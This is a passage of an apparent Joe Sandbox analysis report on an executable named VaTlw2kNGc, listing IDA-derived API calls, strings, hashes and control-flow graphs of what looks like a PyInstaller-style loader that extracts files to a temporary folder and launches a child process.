392->389 393->392
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                    • String ID:
                                                                                                    • API String ID: 1617910340-0
                                                                                                    • Opcode ID: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                                                                    • Instruction ID: af3ee9bd4c262c801d871cd97e80b7e2da0c3bc77c77e1909c4ccdb5f8225516
                                                                                                    • Opcode Fuzzy Hash: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                                                                    • Instruction Fuzzy Hash: D9C1C132B28A45C6EB18EF68E4802BC7771FB49B98B610225DA2E977D5CF3CD051C710

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • FindFirstFileW.KERNELBASE(?,00007FF7691A7EF9,00007FF7691A39E6), ref: 00007FF7691A7A1B
                                                                                                    • RemoveDirectoryW.KERNEL32(?,00007FF7691A7EF9,00007FF7691A39E6), ref: 00007FF7691A7A9E
                                                                                                    • DeleteFileW.KERNELBASE(?,00007FF7691A7EF9,00007FF7691A39E6), ref: 00007FF7691A7ABD
                                                                                                    • FindNextFileW.KERNELBASE(?,00007FF7691A7EF9,00007FF7691A39E6), ref: 00007FF7691A7ACB
                                                                                                    • FindClose.KERNELBASE(?,00007FF7691A7EF9,00007FF7691A39E6), ref: 00007FF7691A7ADC
                                                                                                    • RemoveDirectoryW.KERNELBASE(?,00007FF7691A7EF9,00007FF7691A39E6), ref: 00007FF7691A7AE5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                    • String ID: %s\*
                                                                                                    • API String ID: 1057558799-766152087
                                                                                                    • Opcode ID: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
                                                                                                    • Instruction ID: 37816defd342bae652e1769586292a74f9f788f8579f940ae5ec14237c27edfe
                                                                                                    • Opcode Fuzzy Hash: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
                                                                                                    • Instruction Fuzzy Hash: 46418221A0C542E5EA24BF64F4545B9A370FB94754FE40632D55E82AC8DF3CDB4ACB10
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                    • String ID:
                                                                                                    • API String ID: 2295610775-0
                                                                                                    • Opcode ID: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                                                                    • Instruction ID: 28785ceea2b0b0f30b8a138418f6573cebbaab0393ddc1dbf0bfad79a0c637e8
                                                                                                    • Opcode Fuzzy Hash: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                                                                    • Instruction Fuzzy Hash: B8F0C832A18681C7F7649F60B449366B3B0AB44338F944335D96E02AD4CF3CD459CA00
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                    • String ID:
                                                                                                    • API String ID: 1010374628-0
                                                                                                    • Opcode ID: a8238ebacfbb29389201daedac3868d1c225100c6328c8ae619a1fe2ce119bc6
                                                                                                    • Instruction ID: 25c6fc0ef89a5fc45c7967b23a9b3096af6646bfc2f1bdc2a39380a9beffebbc
                                                                                                    • Opcode Fuzzy Hash: a8238ebacfbb29389201daedac3868d1c225100c6328c8ae619a1fe2ce119bc6
                                                                                                    • Instruction Fuzzy Hash: 1D02BF25A09683C1FE5DBF12B411279E2B2AF05BA0FF94639DE6D473D6DE3CA4019720

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 179 7ff7691a18f0-7ff7691a192b call 7ff7691a3f70 182 7ff7691a1bc1-7ff7691a1be5 call 7ff7691ab870 179->182 183 7ff7691a1931-7ff7691a1971 call 7ff7691a76a0 179->183 188 7ff7691a1977-7ff7691a1987 call 7ff7691af9f4 183->188 189 7ff7691a1bae-7ff7691a1bb1 call 7ff7691af36c 183->189 194 7ff7691a19a1-7ff7691a19bd call 7ff7691af6bc 188->194 195 7ff7691a1989-7ff7691a199c call 7ff7691a2760 188->195 193 7ff7691a1bb6-7ff7691a1bbe 189->193 193->182 200 7ff7691a19bf-7ff7691a19d2 call 7ff7691a2760 194->200 201 7ff7691a19d7-7ff7691a19ec call 7ff7691b4154 194->201 195->189 200->189 206 7ff7691a1a06-7ff7691a1a87 call 7ff7691a1bf0 * 2 call 7ff7691af9f4 201->206 207 7ff7691a19ee-7ff7691a1a01 call 7ff7691a2760 201->207 215 7ff7691a1a8c-7ff7691a1a9f call 7ff7691b4170 206->215 207->189 218 7ff7691a1aa1-7ff7691a1ab4 call 7ff7691a2760 215->218 219 7ff7691a1ab9-7ff7691a1ad2 call 7ff7691af6bc 215->219 218->189 224 7ff7691a1ad4-7ff7691a1ae7 call 7ff7691a2760 219->224 225 7ff7691a1aec-7ff7691a1b08 call 7ff7691af430 219->225 224->189 230 7ff7691a1b0a-7ff7691a1b16 call 7ff7691a25f0 225->230 231 7ff7691a1b1b-7ff7691a1b29 225->231 230->189 231->189 232 7ff7691a1b2f-7ff7691a1b3e 231->232 234 7ff7691a1b40-7ff7691a1b46 232->234 236 7ff7691a1b60-7ff7691a1b6f 234->236 237 7ff7691a1b48-7ff7691a1b55 234->237 236->236 238 7ff7691a1b71-7ff7691a1b7a 236->238 237->238 239 7ff7691a1b8f 238->239 240 7ff7691a1b7c-7ff7691a1b7f 238->240 242 7ff7691a1b91-7ff7691a1bac 239->242 240->239 241 7ff7691a1b81-7ff7691a1b84 240->241 241->239 243 7ff7691a1b86-7ff7691a1b89 241->243 242->189 242->234 243->239 244 7ff7691a1b8b-7ff7691a1b8d 243->244 244->242
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _fread_nolock$Message
                                                                                                    • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                    • API String ID: 677216364-3497178890
                                                                                                    • Opcode ID: d6aeb8e3ca7c5b5e1cbced0a86e6549a8ab5df6ab8c5daac5096595605ddb0bc
                                                                                                    • Instruction ID: 6e817fb7fd7a4d2593f2607697d9b8ea0804b25ccb16239f813aec2121c207b8
                                                                                                    • Opcode Fuzzy Hash: d6aeb8e3ca7c5b5e1cbced0a86e6549a8ab5df6ab8c5daac5096595605ddb0bc
                                                                                                    • Instruction Fuzzy Hash: A5719371A18686C9EB28EF15F4502B9A3B1FB44784FE44035D98D87B99EE2CE945CB20

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 245 7ff7691a15c0-7ff7691a15d1 246 7ff7691a15d3-7ff7691a15dc call 7ff7691a1050 245->246 247 7ff7691a15f7-7ff7691a1611 call 7ff7691a3f70 245->247 254 7ff7691a15ee-7ff7691a15f6 246->254 255 7ff7691a15de-7ff7691a15e9 call 7ff7691a25f0 246->255 252 7ff7691a1613-7ff7691a163a call 7ff7691a2760 247->252 253 7ff7691a163b-7ff7691a1655 call 7ff7691a3f70 247->253 261 7ff7691a1671-7ff7691a1688 call 7ff7691af9f4 253->261 262 7ff7691a1657-7ff7691a166c call 7ff7691a25f0 253->262 255->254 268 7ff7691a168a-7ff7691a16a6 call 7ff7691a2760 261->268 269 7ff7691a16ab-7ff7691a16af 261->269 267 7ff7691a17c5-7ff7691a17c8 call 7ff7691af36c 262->267 275 7ff7691a17cd-7ff7691a17df 267->275 278 7ff7691a17bd-7ff7691a17c0 call 7ff7691af36c 268->278 271 7ff7691a16b1-7ff7691a16bd call 7ff7691a11f0 269->271 272 7ff7691a16c9-7ff7691a16e9 call 7ff7691b4170 269->272 279 7ff7691a16c2-7ff7691a16c4 271->279 282 7ff7691a170c-7ff7691a1717 272->282 283 7ff7691a16eb-7ff7691a1707 call 7ff7691a2760 272->283 278->267 279->278 285 7ff7691a17a6-7ff7691a17ae call 7ff7691b415c 282->285 286 7ff7691a171d-7ff7691a1726 282->286 290 7ff7691a17b3-7ff7691a17b8 283->290 285->290 289 7ff7691a1730-7ff7691a1752 call 7ff7691af6bc 286->289 294 7ff7691a1754-7ff7691a176c call 7ff7691afdfc 289->294 295 7ff7691a1785-7ff7691a178c 289->295 290->278 300 7ff7691a1775-7ff7691a1783 294->300 301 7ff7691a176e-7ff7691a1771 294->301 297 7ff7691a1793-7ff7691a179c call 7ff7691a2760 295->297 304 7ff7691a17a1 297->304 300->297 301->289 303 7ff7691a1773 301->303 303->304 304->285
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message
                                                                                                    • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                    • API String ID: 2030045667-1550345328
                                                                                                    • Opcode ID: 9f90bf69893fd466a5eac497926a5e2d94e152424ac8e9b1177f909cfdea5f56
                                                                                                    • Instruction ID: 00c4444d75a7bfdf61dccc0a815bbe355591a298c757a8cc661feb79e62edf0a
                                                                                                    • Opcode Fuzzy Hash: 9f90bf69893fd466a5eac497926a5e2d94e152424ac8e9b1177f909cfdea5f56
                                                                                                    • Instruction Fuzzy Hash: 4E519A61B08642D2EA18BF61B9001B9A3B0BF44B94FE44131EE1D87FD5EE3CE955C720

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                                                    • String ID: CreateProcessW$Failed to create child process!
                                                                                                    • API String ID: 2895956056-699529898
                                                                                                    • Opcode ID: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
                                                                                                    • Instruction ID: 80f10013f5adadd07f0faabdc45a136860996e77bc39537f9d07cbdcaac1c13e
                                                                                                    • Opcode Fuzzy Hash: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
                                                                                                    • Instruction Fuzzy Hash: 58412032A08781C5DA24AF24F4552AAB3B1FB88364FA40335E6AD47BD9DF7CD445CB50

                                                                                                    Control-flow Graph

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message
                                                                                                    • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                    • API String ID: 2030045667-2813020118
                                                                                                    • Opcode ID: bb86d4b09916ff62f83bc664640a5bb88bf9c2c6ab5ccf9a34b792e00a5b311f
                                                                                                    • Instruction ID: afbe93d9745f3c213c613500cf7cb2aee57ed989e43ba1029df23616921d1b8e
                                                                                                    • Opcode Fuzzy Hash: bb86d4b09916ff62f83bc664640a5bb88bf9c2c6ab5ccf9a34b792e00a5b311f
                                                                                                    • Instruction Fuzzy Hash: B751E462A08642C1E669BF16B8503BAA2A1BF457A4FE44135ED4D47FD5EF3CE901C720

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetTempPathW.KERNEL32(?,?,FFFFFFFF,00007FF7691A3834), ref: 00007FF7691A7CE4
                                                                                                    • CreateDirectoryW.KERNELBASE(?,?,FFFFFFFF,00007FF7691A3834), ref: 00007FF7691A7D2C
                                                                                                      • Part of subcall function 00007FF7691A7E10: GetEnvironmentVariableW.KERNEL32(00007FF7691A365F), ref: 00007FF7691A7E47
                                                                                                      • Part of subcall function 00007FF7691A7E10: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7691A7E69
                                                                                                      • Part of subcall function 00007FF7691B7548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7691B7561
                                                                                                      • Part of subcall function 00007FF7691A26C0: MessageBoxW.USER32 ref: 00007FF7691A2736
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Environment$CreateDirectoryExpandMessagePathStringsTempVariable_invalid_parameter_noinfo
                                                                                                    • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                    • API String ID: 740614611-1339014028
                                                                                                    • Opcode ID: 11860e683bfeec2df00dcc2c56da5dbb6591d5702bb717516bbb2bb41ff9b0e3
                                                                                                    • Instruction ID: 1f07de73959348c7c154c4174419d6cdd0ac35e422deaef3ae17e57a6a4893d9
                                                                                                    • Opcode Fuzzy Hash: 11860e683bfeec2df00dcc2c56da5dbb6591d5702bb717516bbb2bb41ff9b0e3
                                                                                                    • Instruction Fuzzy Hash: 4C416011F09642C1EA28BF61B9552F9D271AF45B80FE44032ED1E57BDAEE3CEA05C760

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 546 7ff7691bad6c-7ff7691bad92 547 7ff7691bad94-7ff7691bada8 call 7ff7691b43d4 call 7ff7691b43f4 546->547 548 7ff7691badad-7ff7691badb1 546->548 566 7ff7691bb19e 547->566 550 7ff7691bb187-7ff7691bb193 call 7ff7691b43d4 call 7ff7691b43f4 548->550 551 7ff7691badb7-7ff7691badbe 548->551 568 7ff7691bb199 call 7ff7691b9bf0 550->568 551->550 554 7ff7691badc4-7ff7691badf2 551->554 554->550 555 7ff7691badf8-7ff7691badff 554->555 558 7ff7691bae01-7ff7691bae13 call 7ff7691b43d4 call 7ff7691b43f4 555->558 559 7ff7691bae18-7ff7691bae1b 555->559 558->568 564 7ff7691bae21-7ff7691bae27 559->564 565 7ff7691bb183-7ff7691bb185 559->565 564->565 570 7ff7691bae2d-7ff7691bae30 564->570 569 7ff7691bb1a1-7ff7691bb1b8 565->569 566->569 568->566 570->558 573 7ff7691bae32-7ff7691bae57 570->573 575 7ff7691bae8a-7ff7691bae91 573->575 576 7ff7691bae59-7ff7691bae5b 573->576 577 7ff7691bae66-7ff7691bae7d call 7ff7691b43d4 call 7ff7691b43f4 call 7ff7691b9bf0 575->577 578 7ff7691bae93-7ff7691baebb call 7ff7691bc90c call 7ff7691b9c58 * 2 575->578 579 7ff7691bae82-7ff7691bae88 576->579 580 7ff7691bae5d-7ff7691bae64 576->580 607 7ff7691bb010 577->607 609 7ff7691baed8-7ff7691baf03 call 7ff7691bb594 578->609 610 7ff7691baebd-7ff7691baed3 call 7ff7691b43f4 call 7ff7691b43d4 578->610 581 7ff7691baf08-7ff7691baf1f 579->581 580->577 580->579 584 7ff7691baf21-7ff7691baf29 581->584 585 7ff7691baf9a-7ff7691bafa4 call 7ff7691c2c2c 581->585 584->585 588 7ff7691baf2b-7ff7691baf2d 584->588 596 7ff7691bafaa-7ff7691bafbf 585->596 597 7ff7691bb02e 585->597 588->585 594 7ff7691baf2f-7ff7691baf45 588->594 594->585 599 7ff7691baf47-7ff7691baf53 594->599 596->597 601 7ff7691bafc1-7ff7691bafd3 GetConsoleMode 596->601 605 7ff7691bb033-7ff7691bb053 ReadFile 597->605 599->585 603 7ff7691baf55-7ff7691baf57 599->603 601->597 606 7ff7691bafd5-7ff7691bafdd 601->606 603->585 608 7ff7691baf59-7ff7691baf71 603->608 611 7ff7691bb059-7ff7691bb061 605->611 612 7ff7691bb14d-7ff7691bb156 GetLastError 605->612 606->605 615 7ff7691bafdf-7ff7691bb001 ReadConsoleW 606->615 618 7ff7691bb013-7ff7691bb01d call 7ff7691b9c58 607->618 608->585 619 7ff7691baf73-7ff7691baf7f 608->619 609->581 610->607 611->612 613 7ff7691bb067 611->613 616 7ff7691bb173-7ff7691bb176 612->616 617 7ff7691bb158-7ff7691bb16e call 7ff7691b43f4 call 7ff7691b43d4 612->617 621 7ff7691bb06e-7ff7691bb083 613->621 623 7ff7691bb022-7ff7691bb02c 615->623 624 7ff7691bb003 GetLastError 615->624 628 7ff7691bb009-7ff7691bb00b call 7ff7691b4368 616->628 629 7ff7691bb17c-7ff7691bb17e 616->629 617->607 618->569 619->585 627 7ff7691baf81-7ff7691baf83 619->627 621->618 631 7ff7691bb085-7ff7691bb090 621->631 623->621 624->628 627->585 635 7ff7691baf85-7ff7691baf95 627->635 628->607 629->618 638 7ff7691bb092-7ff7691bb0ab call 7ff7691ba984 631->638 639 7ff7691bb0b7-7ff7691bb0bf 631->639 635->585 646 7ff7691bb0b0-7ff7691bb0b2 638->646 642 7ff7691bb0c1-7ff7691bb0d3 639->642 643 7ff7691bb13b-7ff7691bb148 call 7ff7691ba7c4 639->643 647 7ff7691bb0d5 642->647 648 7ff7691bb12e-7ff7691bb136 642->648 643->646 646->618 650 7ff7691bb0da-7ff7691bb0e1 647->650 648->618 651 7ff7691bb0e3-7ff7691bb0e7 650->651 652 7ff7691bb11d-7ff7691bb128 650->652 653 7ff7691bb103 651->653 654 7ff7691bb0e9-7ff7691bb0f0 651->654 652->648 656 7ff7691bb109-7ff7691bb119 653->656 654->653 655 7ff7691bb0f2-7ff7691bb0f6 654->655 655->653 658 7ff7691bb0f8-7ff7691bb101 655->658 656->650 657 7ff7691bb11b 656->657 657->648 658->656
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: 7e4b6968f21da67f115f2b5899b729ebe27c21aa0167ab1df282e77588440d71
                                                                                                    • Instruction ID: fdff0f622d5cce48fc36476010f4086c5bf72174902ca68bb17410ab2a2f49db
                                                                                                    • Opcode Fuzzy Hash: 7e4b6968f21da67f115f2b5899b729ebe27c21aa0167ab1df282e77588440d71
                                                                                                    • Instruction Fuzzy Hash: 4FC1E862A0C687D1E769BF15B4802BDB7B2EB90B90FB54131DA5E03B99CE7CE445C320

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                    • String ID:
                                                                                                    • API String ID: 995526605-0
                                                                                                    • Opcode ID: 748b97fd960fc4e5004671791fa0bd5d217265360f36ca399a643c65045a3ab9
                                                                                                    • Instruction ID: 041b1a80ef0167759184ee629d728a1cc03cbf31fc9d6165fdfceecc57fa3b13
                                                                                                    • Opcode Fuzzy Hash: 748b97fd960fc4e5004671791fa0bd5d217265360f36ca399a643c65045a3ab9
                                                                                                    • Instruction Fuzzy Hash: E3212121E0CB43C1EA14AF55B44422AE3B5EB857A4FA40235DA7D43AD8DF7CD9458B10

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetModuleFileNameW.KERNEL32(?,00007FF7691A3534), ref: 00007FF7691A3411
                                                                                                      • Part of subcall function 00007FF7691A29E0: GetLastError.KERNEL32(?,?,?,00007FF7691A342E,?,00007FF7691A3534), ref: 00007FF7691A2A14
                                                                                                      • Part of subcall function 00007FF7691A29E0: FormatMessageW.KERNEL32(?,?,?,00007FF7691A342E), ref: 00007FF7691A2A7D
                                                                                                      • Part of subcall function 00007FF7691A29E0: MessageBoxW.USER32 ref: 00007FF7691A2ACF
                                                                                                    Strings
                                                                                                    Memory Dump Source
